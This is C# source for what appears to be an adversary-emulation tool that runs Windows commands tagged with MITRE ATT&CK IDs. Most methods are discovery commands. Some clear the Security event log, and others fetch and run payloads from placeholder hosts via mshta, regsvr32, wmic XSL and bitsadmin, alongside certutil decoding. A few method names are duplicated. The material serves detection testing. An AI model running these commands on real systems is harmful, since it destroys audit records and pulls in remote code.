/// <summary>
/// Simulation for MITRE ATT&amp;CK T1059.003 (Windows Command Shell): hands the
/// command line <c>cmd.exe /C whoami</c> to <c>ExecutionHelper.StartProcessApi</c>.
/// </summary>
/// <param name="log">
/// Appended as-is to <c>AppDomain.CurrentDomain.BaseDirectory</c> to form the
/// logger path; no separator or validation is applied here.
/// </param>
public static void WindowsCommandShell(string log)
{
    var simLog = new Lib.Logger(AppDomain.CurrentDomain.BaseDirectory + log);
    simLog.SimulationHeader("T1059.003");

    try
    {
        const string commandLine = "cmd.exe /C whoami";
        ExecutionHelper.StartProcessApi("", commandLine, simLog);
        simLog.SimulationFinished();
    }
    catch (Exception error)
    {
        // Failures are handed to the logger and not rethrown.
        simLog.SimulationFailed(error);
    }
}
/// <summary>
/// Simulation for MITRE ATT&amp;CK T1016 (System Network Configuration Discovery):
/// passes <c>ipconfig /all</c> to <c>ExecutionHelper.StartProcess</c>.
/// </summary>
/// <param name="log">
/// Appended as-is to <c>AppDomain.CurrentDomain.BaseDirectory</c> to form the
/// logger path; no separator or validation is applied here.
/// </param>
public static void SystemNetworkConfigurationDiscovery(string log)
{
    var simLog = new Lib.Logger(AppDomain.CurrentDomain.BaseDirectory + log);
    simLog.SimulationHeader("T1016");

    try
    {
        const string commandLine = "ipconfig /all";
        ExecutionHelper.StartProcess("", commandLine, simLog);
        simLog.SimulationFinished();
    }
    catch (Exception error)
    {
        // Failures are handed to the logger and not rethrown.
        simLog.SimulationFailed(error);
    }
}
/// <summary>
/// Simulation for MITRE ATT&amp;CK T1083 (File and Directory Discovery): issues two
/// <c>dir</c> listings whose output is appended to <c>%temp%\download</c>.
/// </summary>
/// <param name="log">
/// Appended as-is to <c>AppDomain.CurrentDomain.BaseDirectory</c> to form the
/// logger path; no separator or validation is applied here.
/// </param>
public static void FileAndDirectoryDiscovery(string log)
{
    var simLog = new Lib.Logger(AppDomain.CurrentDomain.BaseDirectory + log);
    simLog.SimulationHeader("T1083");

    try
    {
        // `dir`, `>>` and `%temp%` are command-interpreter syntax.
        // NOTE(review): they only take effect if StartProcess runs the string
        // through cmd.exe - not visible from this method; confirm in ExecutionHelper.
        string listRoot = @"dir c:\ >> %temp%\download";
        string listUsers = @"dir C:\Users\ >> %temp%\download";

        ExecutionHelper.StartProcess("", listRoot, simLog);

        // NOTE(review): the meaning of the trailing `true` is defined by
        // ExecutionHelper.StartProcess. Nothing in this method removes
        // %temp%\download afterwards - verify whether that flag does.
        ExecutionHelper.StartProcess("", listUsers, simLog, true);

        simLog.SimulationFinished();
    }
    catch (Exception error)
    {
        // Failures are handed to the logger and not rethrown.
        simLog.SimulationFailed(error);
    }
}
/// <summary>
/// Simulation for MITRE ATT&amp;CK T1218.011 (Rundll32): passes
/// <c>rundll32 "C:\Windows\twain_64.dll"</c> to <c>ExecutionHelper.StartProcess</c>.
/// </summary>
/// <param name="log">
/// Appended as-is to <c>AppDomain.CurrentDomain.BaseDirectory</c> to form the
/// logger path; no separator or validation is applied here.
/// </param>
public static void Rundll32(string log)
{
    var simLog = new Lib.Logger(AppDomain.CurrentDomain.BaseDirectory + log);
    simLog.SimulationHeader("T1218.011");

    try
    {
        // Hard-coded DLL path; the command line names no export after it.
        string dllPath = @"C:\Windows\twain_64.dll";
        string commandLine = "rundll32 \"" + dllPath + "\"";

        ExecutionHelper.StartProcess("", commandLine, simLog);
        simLog.SimulationFinished();
    }
    catch (Exception error)
    {
        // Failures are handed to the logger and not rethrown.
        simLog.SimulationFailed(error);
    }
}
/// <summary>
/// Simulation for MITRE ATT&amp;CK T1070.001 (Clear Windows Event Logs): passes
/// <c>wevtutil.exe cl Security</c> to <c>ExecutionHelper.StartProcess</c>.
/// </summary>
/// <remarks>
/// This is not a dry run: when the command succeeds the host's Security log is
/// emptied. Windows records event ID 1102 ("The audit log was cleared") in the
/// Security log when that happens, which is the usual artifact to alert on.
/// <c>wevtutil cl</c> needs administrative rights to clear the Security log.
/// </remarks>
/// <param name="log">
/// Appended as-is to <c>AppDomain.CurrentDomain.BaseDirectory</c> to form the
/// logger path; no separator or validation is applied here.
/// </param>
public static void ClearSecurityEventLogCmd(string log)
{
    var simLog = new Lib.Logger(AppDomain.CurrentDomain.BaseDirectory + log);
    simLog.SimulationHeader("T1070.001");
    simLog.TimestampInfo("Using the command line to execute the technique");

    try
    {
        const string commandLine = "wevtutil.exe cl Security";
        ExecutionHelper.StartProcess("", commandLine, simLog);
        simLog.SimulationFinished();
    }
    catch (Exception error)
    {
        // Failures (for example a non-elevated run) are handed to the logger
        // and not rethrown.
        simLog.SimulationFailed(error);
    }
}
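/// <summary>
/// Simulation for MITRE ATT&amp;CK T1218.004 (InstallUtil): passes an
/// <c>InstallUtil.exe ... /U</c> command line for a hard-coded file under
/// <c>C:\Windows\Temp</c> to <c>ExecutionHelper.StartProcess</c>.
/// </summary>
/// <remarks>
/// The target file is not created by this method, and the InstallUtil path is
/// pinned to the 32-bit <c>Framework\v4.0.30319</c> directory.
/// </remarks>
/// <param name="log">
/// Appended as-is to <c>AppDomain.CurrentDomain.BaseDirectory</c> to form the
/// logger path; no separator or validation is applied here.
/// </param>
public static void InstallUtil(string log)
{
    string currentPath = AppDomain.CurrentDomain.BaseDirectory;
    Lib.Logger logger = new Lib.Logger(currentPath + log);
    logger.SimulationHeader("T1218.004");

    try
    {
        const string installUtilPath = @"C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe";
        string file = @"C:\Windows\Temp\XKNqbpzl.exe";

        // Fix: the switch value was misspelled as "/LogToConsole=alse"; it is now
        // "/LogToConsole=false", so the recorded command line matches the
        // documented form that detections for this technique key on.
        // NOTE(review): "/logfiles" is kept as found; the documented switch is
        // "/LogFile=[filename]" - confirm which spelling is intended.
        string commandLine = String.Format("{0} /logfiles /LogToConsole=false /U {1}", installUtilPath, file);

        ExecutionHelper.StartProcess("", commandLine, logger);
        logger.SimulationFinished();
    }
    catch (Exception ex)
    {
        // Failures are handed to the logger and not rethrown.
        logger.SimulationFailed(ex);
    }
}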
/// <summary>
/// Simulation for MITRE ATT&amp;CK T1033 (System Owner/User Discovery): passes
/// <c>whoami</c> and then <c>query user</c> to <c>ExecutionHelper.StartProcess</c>.
/// </summary>
/// <param name="log">
/// Appended as-is to <c>AppDomain.CurrentDomain.BaseDirectory</c> to form the
/// logger path; no separator or validation is applied here.
/// </param>
public static void SystemUserDiscovery(string log)
{
    var simLog = new Lib.Logger(AppDomain.CurrentDomain.BaseDirectory + log);
    simLog.SimulationHeader("T1033");

    try
    {
        // Run in order; an exception from one command skips the ones after it.
        string[] commands = { "whoami", "query user" };
        foreach (string commandLine in commands)
        {
            ExecutionHelper.StartProcess("", commandLine, simLog);
        }

        simLog.SimulationFinished();
    }
    catch (Exception error)
    {
        // Failures are handed to the logger and not rethrown.
        simLog.SimulationFailed(error);
    }
}
/// <summary>
/// Simulation for MITRE ATT&amp;CK T1218.005 (Mshta): passes <c>mshta</c> followed
/// by a hard-coded HTTP URL to <c>ExecutionHelper.StartProcess</c>.
/// </summary>
/// <param name="log">
/// Appended as-is to <c>AppDomain.CurrentDomain.BaseDirectory</c> to form the
/// logger path; no separator or validation is applied here.
/// </param>
public static void Mshta(string log)
{
    var simLog = new Lib.Logger(AppDomain.CurrentDomain.BaseDirectory + log);
    simLog.SimulationHeader("T1218.005");

    try
    {
        // NOTE(review): "webserver" is a bare host name; whether it resolves, and
        // to what, depends on the DNS of the environment the simulation runs in.
        string remoteHta = "http://webserver/payload.hta";
        string commandLine = "mshta " + remoteHta;

        ExecutionHelper.StartProcess("", commandLine, simLog);
        simLog.SimulationFinished();
    }
    catch (Exception error)
    {
        // Failures are handed to the logger and not rethrown.
        simLog.SimulationFailed(error);
    }
}
/// <summary>
/// Simulation for MITRE ATT&amp;CK T1135 (Network Share Discovery): passes
/// <c>net share</c> to <c>ExecutionHelper.StartProcessApi</c>.
/// </summary>
/// <param name="log">
/// Appended as-is to <c>AppDomain.CurrentDomain.BaseDirectory</c> to form the
/// logger path; no separator or validation is applied here.
/// </param>
public static void NetworkShareEnumerationCmdLocal(string log)
{
    var simLog = new Logger(AppDomain.CurrentDomain.BaseDirectory + log);
    simLog.SimulationHeader("T1135");
    simLog.TimestampInfo("Using the command line to execute the technique");

    try
    {
        const string commandLine = "net share";
        ExecutionHelper.StartProcessApi("", commandLine, simLog);
        simLog.SimulationFinished();
    }
    catch (Exception error)
    {
        // Failures are handed to the logger and not rethrown.
        simLog.SimulationFailed(error);
    }
}
/// <summary>
/// PowerShell execution simulation logged under the header "T1086": passes
/// <c>powershell.exe -enc &lt;Base64&gt;</c> to <c>ExecutionHelper.StartProcess</c>.
/// </summary>
/// <remarks>
/// T1086 is the pre-sub-technique ATT&amp;CK ID for PowerShell; the current ID is
/// T1059.001. The header string is kept as found so existing logs still match.
/// </remarks>
/// <param name="log">
/// Appended as-is to <c>AppDomain.CurrentDomain.BaseDirectory</c> to form the
/// logger path; no separator or validation is applied here.
/// </param>
public static void ExecutePowershell(string log)
{
    var simLog = new Lib.Logger(AppDomain.CurrentDomain.BaseDirectory + log);
    simLog.SimulationHeader("T1086");

    try
    {
        // Base64 of UTF-16LE text; it decodes to `Start-Sleep -s 20`, a benign
        // command. Useful when validating that -enc arguments are being decoded
        // by the logging pipeline. (The value is a command, not a password.)
        string encodedCommand = "UwB0AGEAcgB0AC0AUwBsAGUAZQBwACAALQBzACAAMgAwAA==";
        string commandLine = "powershell.exe -enc " + encodedCommand;

        ExecutionHelper.StartProcess("", commandLine, simLog);
        simLog.SimulationFinished();
    }
    catch (Exception error)
    {
        // Failures are handed to the logger and not rethrown.
        simLog.SimulationFailed(error);
    }
}
/// <summary>
/// Simulation for MITRE ATT&amp;CK T1047 (Windows Management Instrumentation):
/// calls <c>ExecutionHelper.StartProcessNET</c> with <c>wmic.exe</c> and the
/// arguments <c>process call create "powershell.exe"</c>.
/// </summary>
/// <remarks>
/// A process started through WMI's process-create method is parented by
/// <c>WmiPrvSE.exe</c>, not by <c>wmic.exe</c>; parent/child process telemetry
/// for this simulation should be read with that in mind.
/// </remarks>
/// <param name="log">
/// Appended as-is to <c>AppDomain.CurrentDomain.BaseDirectory</c> to form the
/// logger path; no separator or validation is applied here.
/// </param>
public static void ExecuteWmiCmd(string log)
{
    var simLog = new Lib.Logger(AppDomain.CurrentDomain.BaseDirectory + log);
    simLog.SimulationHeader("T1047");
    simLog.TimestampInfo("Using the command line to execute the technique");

    try
    {
        // The literal has no format placeholders, so it is passed directly.
        string wmicArguments = @"process call create ""powershell.exe""";

        ExecutionHelper.StartProcessNET("wmic.exe", wmicArguments, simLog);
        simLog.SimulationFinished();
    }
    catch (Exception error)
    {
        // Failures are handed to the logger and not rethrown.
        simLog.SimulationFailed(error);
    }
}
/// <summary>
/// Simulation for MITRE ATT&amp;CK T1220 (XSL Script Processing): passes
/// <c>wmic os get /FORMAT:"&lt;url&gt;"</c> with a hard-coded HTTP URL to
/// <c>ExecutionHelper.StartProcess</c>.
/// </summary>
/// <param name="log">
/// Appended as-is to <c>AppDomain.CurrentDomain.BaseDirectory</c> to form the
/// logger path; no separator or validation is applied here.
/// </param>
public static void XlScriptProcessing(string log)
{
    var simLog = new Lib.Logger(AppDomain.CurrentDomain.BaseDirectory + log);
    simLog.SimulationHeader("T1220");

    try
    {
        // NOTE(review): "webserver" is a bare host name; whether it resolves, and
        // to what, depends on the DNS of the environment the simulation runs in.
        string stylesheetUrl = "http://webserver/payload.xsl";
        string commandLine = "wmic os get /FORMAT:\"" + stylesheetUrl + "\"";

        ExecutionHelper.StartProcess("", commandLine, simLog);
        simLog.SimulationFinished();
    }
    catch (Exception error)
    {
        // Failures are handed to the logger and not rethrown.
        simLog.SimulationFailed(error);
    }
}
/// <summary>
/// Simulation for MITRE ATT&amp;CK T1218.003 (CMSTP): passes
/// <c>cmstp /s /ns &lt;file&gt;</c> to <c>ExecutionHelper.StartProcess</c>.
/// The method name is spelled "Csmtp"; the binary invoked is <c>cmstp</c>.
/// </summary>
/// <param name="log">
/// Appended as-is to <c>AppDomain.CurrentDomain.BaseDirectory</c> to form the
/// logger path; no separator or validation is applied here.
/// </param>
public static void Csmtp(string log)
{
    var simLog = new Lib.Logger(AppDomain.CurrentDomain.BaseDirectory + log);
    simLog.SimulationHeader("T1218.003");

    try
    {
        // Hard-coded to the Administrator profile and not created by this
        // method. The path is placed on the command line unquoted.
        string profilePath = @"C:\Users\Administrator\AppData\Local\Temp\XKNqbpzl.txt";
        string commandLine = "cmstp /s /ns " + profilePath;

        ExecutionHelper.StartProcess("", commandLine, simLog);
        simLog.SimulationFinished();
    }
    catch (Exception error)
    {
        // Failures are handed to the logger and not rethrown.
        simLog.SimulationFailed(error);
    }
}
/// <summary>
/// Simulation for MITRE ATT&amp;CK T1007 (System Service Discovery): passes
/// <c>net start</c> and then <c>tasklist /svc</c> to
/// <c>ExecutionHelper.StartProcess</c>.
/// </summary>
/// <param name="log">
/// Appended as-is to <c>AppDomain.CurrentDomain.BaseDirectory</c> to form the
/// logger path; no separator or validation is applied here.
/// </param>
public static void SystemServiceDiscovery(string log)
{
    var simLog = new Lib.Logger(AppDomain.CurrentDomain.BaseDirectory + log);
    simLog.SimulationHeader("T1007");

    try
    {
        // Run in order; an exception from one command skips the ones after it.
        string[] commands = { "net start", "tasklist /svc" };
        foreach (string commandLine in commands)
        {
            ExecutionHelper.StartProcess("", commandLine, simLog);
        }

        simLog.SimulationFinished();
    }
    catch (Exception error)
    {
        // Failures are handed to the logger and not rethrown.
        simLog.SimulationFailed(error);
    }
}
/// <summary>
/// Simulation for MITRE ATT&amp;CK T1569.002 (Service Execution): passes
/// <c>net start UpdaterService</c> and then <c>sc start UpdaterService</c> to
/// <c>ExecutionHelper.StartProcessApi</c>.
/// </summary>
/// <remarks>
/// NOTE(review): this method does not create "UpdaterService"; presumably
/// another simulation installs it first - confirm, otherwise both commands
/// can only report a missing service.
/// </remarks>
/// <param name="log">
/// Appended as-is to <c>AppDomain.CurrentDomain.BaseDirectory</c> to form the
/// logger path; no separator or validation is applied here.
/// </param>
public static void ServiceExecution(string log)
{
    var simLog = new Lib.Logger(AppDomain.CurrentDomain.BaseDirectory + log);
    simLog.SimulationHeader("T1569.002");

    try
    {
        // Run in order; an exception from one command skips the ones after it.
        string[] commands = { "net start UpdaterService", "sc start UpdaterService" };
        foreach (string commandLine in commands)
        {
            ExecutionHelper.StartProcessApi("", commandLine, simLog);
        }

        simLog.SimulationFinished();
    }
    catch (Exception error)
    {
        // Failures are handed to the logger and not rethrown.
        simLog.SimulationFailed(error);
    }
}
/// <summary>
/// Simulation for MITRE ATT&amp;CK T1018 (Remote System Discovery): calls
/// <c>ExecutionHelper.StartProcessNET</c> with <c>cmd.exe</c> and the arguments
/// <c>/c net view</c>.
/// </summary>
/// <param name="log">
/// Appended as-is to <c>AppDomain.CurrentDomain.BaseDirectory</c> to form the
/// logger path; no separator or validation is applied here.
/// </param>
public static void RemoteSystemDiscoveryCmd(string log)
{
    var simLog = new Logger(AppDomain.CurrentDomain.BaseDirectory + log);
    simLog.SimulationHeader("T1018");
    simLog.TimestampInfo("Using the command line to execute the technique");

    try
    {
        const string shell = "cmd.exe";
        const string shellArguments = "/c net view";

        ExecutionHelper.StartProcessNET(shell, shellArguments, simLog);
        simLog.SimulationFinished();
    }
    catch (Exception error)
    {
        // Failures are handed to the logger and not rethrown.
        simLog.SimulationFailed(error);
    }
}
/// <summary>
/// Simulation for MITRE ATT&amp;CK T1059.001 (PowerShell): passes
/// <c>powershell.exe -enc &lt;Base64&gt;</c> to
/// <c>ExecutionHelper.StartProcessApi</c>.
/// </summary>
/// <param name="log">
/// Appended as-is to <c>AppDomain.CurrentDomain.BaseDirectory</c> to form the
/// logger path; no separator or validation is applied here.
/// </param>
public static void ExecutePowershellCmd(string log)
{
    var simLog = new Lib.Logger(AppDomain.CurrentDomain.BaseDirectory + log);
    simLog.SimulationHeader("T1059.001");
    simLog.TimestampInfo("Using the command line to execute the technique");

    try
    {
        // Base64 of UTF-16LE text; it decodes to `Start-Sleep -s 20`, a benign
        // command. Useful when validating that -enc arguments are being decoded
        // by the logging pipeline. (The value is a command, not a password.)
        string encodedCommand = "UwB0AGEAcgB0AC0AUwBsAGUAZQBwACAALQBzACAAMgAwAA==";
        string commandLine = "powershell.exe -enc " + encodedCommand;

        ExecutionHelper.StartProcessApi("", commandLine, simLog);
        simLog.SimulationFinished();
    }
    catch (Exception error)
    {
        // Failures are handed to the logger and not rethrown.
        simLog.SimulationFailed(error);
    }
}
/// <summary>
/// Indicator-removal simulation logged under the header "T1070": passes
/// <c>wevtutil.exe cl Security</c> to <c>ExecutionHelper.StartProcess</c>.
/// </summary>
/// <remarks>
/// This is not a dry run: when the command succeeds the host's Security log is
/// emptied. Windows records event ID 1102 ("The audit log was cleared") in the
/// Security log when that happens, which is the usual artifact to alert on.
/// <c>wevtutil cl</c> needs administrative rights to clear the Security log.
/// </remarks>
/// <param name="log">
/// Appended as-is to <c>AppDomain.CurrentDomain.BaseDirectory</c> to form the
/// logger path; no separator or validation is applied here.
/// </param>
public static void ClearSecurityEventLogCmd(string log)
{
    var simLog = new Lib.Logger(AppDomain.CurrentDomain.BaseDirectory + log);
    simLog.SimulationHeader("T1070");

    // Disabled in the original (host and agent banner lines):
    //logger.TimestampInfo(String.Format("Starting T1070 Simulation on {0}", Environment.MachineName));
    //logger.TimestampInfo(String.Format("Simulation agent running as {0} with PID:{1}", System.Reflection.Assembly.GetEntryAssembly().Location, Process.GetCurrentProcess().Id));

    try
    {
        const string commandLine = "wevtutil.exe cl Security";
        ExecutionHelper.StartProcess("", commandLine, simLog);
        simLog.SimulationFinished();
    }
    catch (Exception error)
    {
        // Failures (for example a non-elevated run) are handed to the logger
        // and not rethrown.
        simLog.SimulationFailed(error);
    }
}
/// <summary>
/// Simulation for MITRE ATT&amp;CK T1049 (System Network Connections Discovery):
/// passes <c>netstat</c>, <c>net use</c> and <c>net session</c>, in that order,
/// to <c>ExecutionHelper.StartProcess</c>.
/// </summary>
/// <param name="log">
/// Appended as-is to <c>AppDomain.CurrentDomain.BaseDirectory</c> to form the
/// logger path; no separator or validation is applied here.
/// </param>
public static void SystemNetworkConnectionsDiscovery(string log)
{
    var simLog = new Lib.Logger(AppDomain.CurrentDomain.BaseDirectory + log);
    simLog.SimulationHeader("T1049");

    try
    {
        // Run in order; an exception from one command skips the ones after it.
        string[] commands = { "netstat", "net use", "net session" };
        foreach (string commandLine in commands)
        {
            ExecutionHelper.StartProcess("", commandLine, simLog);
        }

        simLog.SimulationFinished();
    }
    catch (Exception error)
    {
        // Failures are handed to the logger and not rethrown.
        simLog.SimulationFailed(error);
    }
}
/// <summary>
/// Simulation for MITRE ATT&amp;CK T1140 (Deobfuscate/Decode Files or Information):
/// passes <c>certutil -decode encodedb64.txt decoded.exe</c> to
/// <c>ExecutionHelper.StartProcess</c>.
/// </summary>
/// <param name="log">
/// Appended as-is to <c>AppDomain.CurrentDomain.BaseDirectory</c> to form the
/// logger path; no separator or validation is applied here.
/// </param>
public static void DeobfuscateDecode(string log)
{
    var simLog = new Lib.Logger(AppDomain.CurrentDomain.BaseDirectory + log);
    simLog.SimulationHeader("T1140");

    try
    {
        // Both names are relative and neither file is created by this method.
        // NOTE(review): they resolve against whatever working directory the
        // spawned process gets - confirm in ExecutionHelper.StartProcess.
        string inputName = "encodedb64.txt";
        string outputName = "decoded.exe";
        string commandLine = "certutil -decode " + inputName + " " + outputName;

        ExecutionHelper.StartProcess("", commandLine, simLog);
        simLog.SimulationFinished();
    }
    catch (Exception error)
    {
        // Failures are handed to the logger and not rethrown.
        simLog.SimulationFailed(error);
    }
}
/// <summary>
/// Simulation for MITRE ATT&amp;CK T1087.002 (Account Discovery: Domain Account):
/// passes <c>net user /domain</c> to <c>ExecutionHelper.StartProcess</c>.
/// </summary>
/// <param name="log">
/// Appended as-is to <c>AppDomain.CurrentDomain.BaseDirectory</c> to form the
/// logger path; no separator or validation is applied here.
/// </param>
public static void DomainAccountDiscoveryCmd(string log)
{
    var simLog = new Lib.Logger(AppDomain.CurrentDomain.BaseDirectory + log);
    simLog.SimulationHeader("T1087.002");
    simLog.TimestampInfo("Using the command line to execute the technique");

    try
    {
        const string commandLine = "net user /domain";
        ExecutionHelper.StartProcess("", commandLine, simLog);
        simLog.SimulationFinished();
    }
    catch (Exception error)
    {
        // Failures are handed to the logger and not rethrown.
        simLog.SimulationFailed(error);
    }
}
/// <summary>
/// Simulation for MITRE ATT&amp;CK T1197 (BITS Jobs): passes a
/// <c>bitsadmin /transfer</c> download command with a hard-coded URL and
/// destination file to <c>ExecutionHelper.StartProcess</c>.
/// </summary>
/// <param name="log">
/// Appended as-is to <c>AppDomain.CurrentDomain.BaseDirectory</c> to form the
/// logger path; no separator or validation is applied here.
/// </param>
public static void BitsJobs(string log)
{
    var simLog = new Lib.Logger(AppDomain.CurrentDomain.BaseDirectory + log);
    simLog.SimulationHeader("T1197");

    try
    {
        // NOTE(review): the host in the URL looks like a placeholder; what it
        // resolves to depends on the environment's DNS.
        string sourceUrl = "http://web.evil/sc.exe";
        // Destination sits under C:\Windows\Temp with an Office-like file name.
        string destination = @"C:\Windows\Temp\winword.exe";
        string commandLine = "bitsadmin /transfer job /download /priority high " + sourceUrl + " " + destination;

        ExecutionHelper.StartProcess("", commandLine, simLog);
        simLog.SimulationFinished();
    }
    catch (Exception error)
    {
        // Failures are handed to the logger and not rethrown.
        simLog.SimulationFailed(error);
    }
}
/// <summary>
/// Simulation for MITRE ATT&amp;CK T1059.007 (JavaScript): passes
/// <c>wscript.exe invoice0420.js</c> to <c>ExecutionHelper.StartProcessApi</c>.
/// </summary>
/// <param name="log">
/// Appended as-is to <c>AppDomain.CurrentDomain.BaseDirectory</c> to form the
/// logger path; no separator or validation is applied here.
/// </param>
public static void JScript(string log)
{
    var simLog = new Lib.Logger(AppDomain.CurrentDomain.BaseDirectory + log);
    simLog.SimulationHeader("T1059.007");

    try
    {
        // Relative script name; the file is not created by this method.
        string scriptName = "invoice0420.js";
        string commandLine = "wscript.exe " + scriptName;

        ExecutionHelper.StartProcessApi("", commandLine, simLog);
        simLog.SimulationFinished();
    }
    catch (Exception error)
    {
        // Failures are handed to the logger and not rethrown.
        simLog.SimulationFailed(error);
    }
}
/// <summary>
/// Simulation for MITRE ATT&amp;CK T1218.010 (Regsvr32): passes
/// <c>regsvr32.exe /u /n /s /i:&lt;url&gt; scrobj.dll</c> with a hard-coded HTTP
/// URL to <c>ExecutionHelper.StartProcess</c>.
/// </summary>
/// <param name="log">
/// Appended as-is to <c>AppDomain.CurrentDomain.BaseDirectory</c> to form the
/// logger path; no separator or validation is applied here.
/// </param>
public static void Regsvr32(string log)
{
    var simLog = new Lib.Logger(AppDomain.CurrentDomain.BaseDirectory + log);
    simLog.SimulationHeader("T1218.010");

    try
    {
        // NOTE(review): the host in the URL looks like a placeholder; what it
        // resolves to depends on the environment's DNS.
        string scriptletUrl = @"http://malicious.domain:8080/payload.sct";
        string library = "scrobj.dll";
        string commandLine = "regsvr32.exe /u /n /s /i:" + scriptletUrl + " " + library;

        ExecutionHelper.StartProcess("", commandLine, simLog);
        simLog.SimulationFinished();
    }
    catch (Exception error)
    {
        // Failures are handed to the logger and not rethrown.
        simLog.SimulationFailed(error);
    }
}
/// <summary>
/// Simulation for MITRE ATT&amp;CK T1218.009 (Regsvcs/Regasm): passes
/// <c>regsvcs.exe /U winword.dll</c> and then <c>regasm.exe /U winword.dll</c>,
/// both from the <c>Framework\v4.0.30319</c> directory, to
/// <c>ExecutionHelper.StartProcess</c>.
/// </summary>
/// <param name="log">
/// Appended as-is to <c>AppDomain.CurrentDomain.BaseDirectory</c> to form the
/// logger path; no separator or validation is applied here.
/// </param>
public static void RegsvcsRegasm(string log)
{
    var simLog = new Lib.Logger(AppDomain.CurrentDomain.BaseDirectory + log);
    simLog.SimulationHeader("T1218.009");

    try
    {
        // Relative assembly name; the file is not created by this method.
        string assemblyName = @"winword.dll";
        string frameworkDir = @"C:\Windows\Microsoft.NET\Framework\v4.0.30319\";

        // Run in order; an exception from the first tool skips the second.
        string[] tools = { "regsvcs.exe", "regasm.exe" };
        foreach (string tool in tools)
        {
            ExecutionHelper.StartProcess("", frameworkDir + tool + " /U " + assemblyName, simLog);
        }

        simLog.SimulationFinished();
    }
    catch (Exception error)
    {
        // Failures are handed to the logger and not rethrown.
        simLog.SimulationFailed(error);
    }
}
/// <summary>
/// Simulation for MITRE ATT&amp;CK T1482 (Domain Trust Discovery): calls
/// <c>ExecutionHelper.StartProcessNET</c> with <c>nltest.exe</c> and the argument
/// <c>/domain_trusts</c>.
/// </summary>
/// <param name="log">
/// Appended as-is to <c>AppDomain.CurrentDomain.BaseDirectory</c> to form the
/// logger path; no separator or validation is applied here.
/// </param>
public static void DomainTrustDiscoveryCmd(string log)
{
    var simLog = new Logger(AppDomain.CurrentDomain.BaseDirectory + log);
    simLog.SimulationHeader("T1482");
    simLog.TimestampInfo("Using the command line to execute the technique");

    try
    {
        const string tool = "nltest.exe";
        const string toolArguments = "/domain_trusts";

        ExecutionHelper.StartProcessNET(tool, toolArguments, simLog);

        // Disabled in the original (alternative launch path for the same command):
        //ExecutionHelper.StartProcessApi("","nltest /domain_trusts", logger);

        simLog.SimulationFinished();
    }
    catch (Exception error)
    {
        // Failures are handed to the logger and not rethrown.
        simLog.SimulationFailed(error);
    }
}
/// <summary>
/// Simulation for MITRE ATT&amp;CK T1201 (Password Policy Discovery): passes
/// <c>net accounts</c> and then <c>net accounts /domain</c> to
/// <c>ExecutionHelper.StartProcessApi</c>.
/// </summary>
/// <param name="log">
/// Appended as-is to <c>AppDomain.CurrentDomain.BaseDirectory</c> to form the
/// logger path; no separator or validation is applied here.
/// </param>
public static void PasswordPolicyDiscovery(string log)
{
    var simLog = new Lib.Logger(AppDomain.CurrentDomain.BaseDirectory + log);
    simLog.SimulationHeader("T1201");
    simLog.TimestampInfo("Using the command line to execute the technique");

    try
    {
        // Local policy first, then the domain policy; an exception from the
        // first command skips the second.
        string[] commands = { "net accounts", "net accounts /domain" };
        foreach (string commandLine in commands)
        {
            ExecutionHelper.StartProcessApi("", commandLine, simLog);
        }

        simLog.SimulationFinished();
    }
    catch (Exception error)
    {
        // Failures are handed to the logger and not rethrown.
        simLog.SimulationFailed(error);
    }
}
/// <summary>
/// Simulation for MITRE ATT&amp;CK T1033 (System Owner/User Discovery): passes
/// <c>whoami</c> and then <c>query user</c> to <c>ExecutionHelper.StartProcess</c>.
/// </summary>
/// <param name="log">
/// Appended as-is to <c>AppDomain.CurrentDomain.BaseDirectory</c> to form the
/// logger path; no separator or validation is applied here.
/// </param>
public static void SystemUserDiscovery(string log)
{
    var simLog = new Lib.Logger(AppDomain.CurrentDomain.BaseDirectory + log);
    simLog.SimulationHeader("T1033");

    // Disabled in the original (host and agent banner lines):
    //logger.TimestampInfo(String.Format("Starting T1033 Simulation on {0}", Environment.MachineName));
    //logger.TimestampInfo(String.Format("Simulation agent running as {0} with PID:{1}", System.Reflection.Assembly.GetEntryAssembly().Location, Process.GetCurrentProcess().Id));

    try
    {
        // Run in order; an exception from one command skips the ones after it.
        string[] commands = { "whoami", "query user" };
        foreach (string commandLine in commands)
        {
            ExecutionHelper.StartProcess("", commandLine, simLog);
        }

        simLog.SimulationFinished();
    }
    catch (Exception error)
    {
        // Failures are handed to the logger and not rethrown.
        simLog.SimulationFailed(error);
    }
}
/// <summary>
/// Simulation for MITRE ATT&amp;CK T1069.001 (Permission Groups Discovery: Local
/// Groups): passes <c>net localgroup</c> and then
/// <c>net localgroup "Administrators"</c> to <c>ExecutionHelper.StartProcess</c>.
/// </summary>
/// <param name="log">
/// Appended as-is to <c>AppDomain.CurrentDomain.BaseDirectory</c> to form the
/// logger path; no separator or validation is applied here.
/// </param>
public static void LocalGroups(string log)
{
    var simLog = new Lib.Logger(AppDomain.CurrentDomain.BaseDirectory + log);
    simLog.SimulationHeader("T1069.001");
    simLog.TimestampInfo("Using the command line to execute the technique");

    try
    {
        // The group name is the English literal "Administrators"; hosts with a
        // localized group name will not match it.
        string[] commands = { "net localgroup", "net localgroup \"Administrators\"" };
        foreach (string commandLine in commands)
        {
            ExecutionHelper.StartProcess("", commandLine, simLog);
        }

        simLog.SimulationFinished();
    }
    catch (Exception error)
    {
        // Failures are handed to the logger and not rethrown.
        simLog.SimulationFailed(error);
    }
}
/// <summary>
/// Simulation for MITRE ATT&amp;CK T1124 (System Time Discovery): passes
/// <c>w32tm /tz</c> and then <c>time /T</c> to <c>ExecutionHelper.StartProcess</c>.
/// </summary>
/// <param name="log">
/// Appended as-is to <c>AppDomain.CurrentDomain.BaseDirectory</c> to form the
/// logger path; no separator or validation is applied here.
/// </param>
public static void SystemTimeDiscovery(string log)
{
    var simLog = new Lib.Logger(AppDomain.CurrentDomain.BaseDirectory + log);
    simLog.SimulationHeader("T1124");
    simLog.TimestampInfo("Using the command line to execute the technique");

    try
    {
        // `time` is a cmd.exe built-in, not a standalone executable.
        // NOTE(review): the second command only runs if StartProcess routes the
        // string through a command interpreter - confirm in ExecutionHelper.
        string[] commands = { "w32tm /tz", "time /T" };
        foreach (string commandLine in commands)
        {
            ExecutionHelper.StartProcess("", commandLine, simLog);
        }

        simLog.SimulationFinished();
    }
    catch (Exception error)
    {
        // Failures are handed to the logger and not rethrown.
        simLog.SimulationFailed(error);
    }
}